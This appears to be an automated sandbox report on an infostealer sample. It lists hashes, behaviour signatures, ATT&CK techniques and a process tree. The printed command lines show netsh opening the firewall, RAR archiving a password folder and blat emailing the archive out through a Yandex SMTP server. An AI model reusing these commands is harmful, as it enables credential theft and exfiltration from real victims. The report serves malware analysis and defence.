c2bf7c850b47723a1a3fcde1ee1b45e20814f540ce80a722589feda5ffbeb462

Analysis

max time kernel
120s
max time network
140s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26/12/2023, 06:53

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

5ae20a856a74a2e2755d0b29bbc88040.exe
Size

410KB
MD5

5ae20a856a74a2e2755d0b29bbc88040
SHA1

04e3d0783bc1ba61ff65037710078b9ebfdd5f5f
SHA256

c2bf7c850b47723a1a3fcde1ee1b45e20814f540ce80a722589feda5ffbeb462
SHA512

63e3915ee3063d19e1e0f363fdc03112eca71eabd089382c47a8a0cb7a634aef792a62279240761aa103417970702a43cb682b0f390f5716fd3307201c71c57a
SSDEEP

12288:Qutrzh9xOXkqS3G4htVfnnH7EhYj88VykRRgjPcN:Qutr5OUql4htVfnnH7E+A8ok8q

Score

8^/10

evasion spyware stealer upx

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2616	netsh.exe
2428	netsh.exe

Executes dropped EXE 4 IoCs

pid	Process
2824	cookies.exe
3024	Rar.exe
1932	blat.exe
2912	blat.exe

Loads dropped DLL 8 IoCs

pid	Process
2904	5ae20a856a74a2e2755d0b29bbc88040.exe
2904	5ae20a856a74a2e2755d0b29bbc88040.exe
2732	cmd.exe
2732	cmd.exe
2732	cmd.exe
2732	cmd.exe
2732	cmd.exe
2732	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000014ab3-11.dat	upx
behavioral1/memory/2824-19-0x0000000000400000-0x0000000000410000-memory.dmp	upx
behavioral1/memory/2824-62-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2904 wrote to memory of 2824	2904	5ae20a856a74a2e2755d0b29bbc88040.exe	28
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2824 wrote to memory of 2732	2824	cookies.exe	29
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2428	2732	cmd.exe	31
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 2616	2732	cmd.exe	32
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 3024	2732	cmd.exe	33
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 1932	2732	cmd.exe	34
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35
PID 2732 wrote to memory of 2912	2732	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\5ae20a856a74a2e2755d0b29bbc88040.exe
"C:\Users\Admin\AppData\Local\Temp\5ae20a856a74a2e2755d0b29bbc88040.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2904
- C:\1\cookies.exe
  "C:\1\cookies.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\AD11.tmp\cookies.bat" "
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "blat.exe" "Windows" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2428
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "MPR.exe" "Windows" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2616
  - - C:\1\Rar.exe
      C:\1\Rar.exe a -r C:\1\pass.rar C:\1\my_pass\
      4⤵
      Executes dropped EXE
      PID:3024
  - - C:\1\blat.exe
      C:\1\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u [email protected] -pw yuihjkbnm
      4⤵
      Executes dropped EXE
      PID:1932
  - - C:\1\blat.exe
      C:\1\blat.exe VTILVGXH.txt -attach C:\1\pass.rar -to [email protected]
      4⤵
      Executes dropped EXE
      PID:2912

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\1\Rar.exe

Filesize
278KB

MD5
ac46eebc3fcaa6da081d6040db532c66

SHA1
1b6f71971444c8c2572e715e226089468b4929da

SHA256
91d5bcbc3088b907f6ac9974c9510dcfee28b922136f1447c3b05a0d1a38ad30

SHA512
9755b2305dd209aa5fad69bb895ac600b57f3d471a098d16bfb6567f17d724aae89e9b74d5206d3f9887c9d1167dd3b7aae28786bc4b26fcb53ad340a7a56bef

Download Submit
C:\1\blat.dll

Filesize
120KB

MD5
724cae63522f6e5f7565a3bf4b2a719b

SHA1
18620dbd4357d85918070f669ff4b61755290757

SHA256
b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

SHA512
af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

Download Submit
C:\1\blat.exe

Filesize
34KB

MD5
4e5defe1df43a87d62946b59695a948b

SHA1
3958289109c6b9ad7a3d8e5657ae7bc8c45b34e1

SHA256
2a4142e7b1f8983c9df4b6421224f43d67f7215b6b439d7f368804550fd1485c

SHA512
61caef52ca1c3a5e1f8958c03ea5ef032e9d9da771dfe86a472b73031b1f09ec0e8f9ff7e67ebfa922f5f835aebaa2b65186bd349cb9d43c1e0f37d6d5f2fbda

Download Submit
C:\1\blat.lib

Filesize
2KB

MD5
3cd3cffda2b5108e2778f94429c624d6

SHA1
3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

SHA256
b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

SHA512
c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

Download Submit
C:\1\pass.rar

Filesize
58KB

MD5
8078c3cad4ee70d638fb353946afd404

SHA1
50c9f93074fc5f4b80421bd396850a04e217068c

SHA256
9a8acb98b24069e44edffb3f4a2805c5f26483242e1507d0c19b059128c69fe1

SHA512
b63b31f68d9fe6e3ec780f7a2567ae906bb53b676dbba6e948a0497754ebe70616717369324e02c2692a4ff6da1b90964d852a675c15c8923023bfe1cd58a416

Download Submit
C:\Users\Admin\AppData\Local\Temp\AD11.tmp\cookies.bat

Filesize
1KB

MD5
120f93ad008758f4a2da8dc5a0c65730

SHA1
3de7aa7a0f57672f95ac6f062e6d0ded4e15b464

SHA256
2229ea1c10b9d1925de4e27613ae36d9e85542d07fc9c7fa72aae5664d7a0414

SHA512
97d09b9df8a8bf14d69e3406f09c674bf70142bc8c9a2c9a66dca46fff7fc200d7940af3e550ac46f27effebb23eee4734588481677dbc38d7fe735afd781108

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VTILVGXH.txt

Filesize
31B

MD5
9cd98ecac9e256a5b7bc61a82808b1fa

SHA1
21c4c0942903a772b4c1a6a0df0d7e53dfc7ebe2

SHA256
d96e61d954a3426055a609aefe83de5c42d06f8c71cafd93c193b0fabd69905b

SHA512
ac627be1798590c42640a92b582581cc7db3d0eff863a9adcb2e2bed9c35f09a0bc1dd9e8a247aad8a418f3d49ae4e9241120416274f1875774af2024a2c6f2e

Download Submit
\1\Rar.exe

Filesize
368KB

MD5
540aa99c92b9c35679f40c4f121b1ed4

SHA1
b14fcd60d6347063d05594b03324567399bb5880

SHA256
4c84ef94ac95976b5c048e517cabf67af6daf64a8711fb57a9129ef5f78d1154

SHA512
11b2035bb0e9be80bbf4267bfca357aa73a820857f6d52e88f2b63ec8a910c93d20ad54a1dc24538ce4a441d097bb6059e983fb57d532cac2155fa58a4f89661

Download Submit
\1\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
\1\cookies.exe

Filesize
21KB

MD5
a2b079657765e16a5a9259af0064a293

SHA1
04156667a14325818d9949be79539a9bcd59665d

SHA256
77609a8f6b33e29b39c94020f80b64f3d57fd05f4451acf79d41f5014309c505

SHA512
93dbb538fa8a25762c3d66ce2c195aa72eca7ef3532b6f40e7c303a476d96b3224a32fbde5d989cbb5c197e10a764d8bbb213d06efa56c0676a8eba4aa6fc32e

Download Submit
memory/2824-19-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2824-62-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/2904-18-0x0000000001EB0000-0x0000000001EC0000-memory.dmp

Filesize
64KB

Download
memory/2904-63-0x0000000001EB0000-0x0000000001EC0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads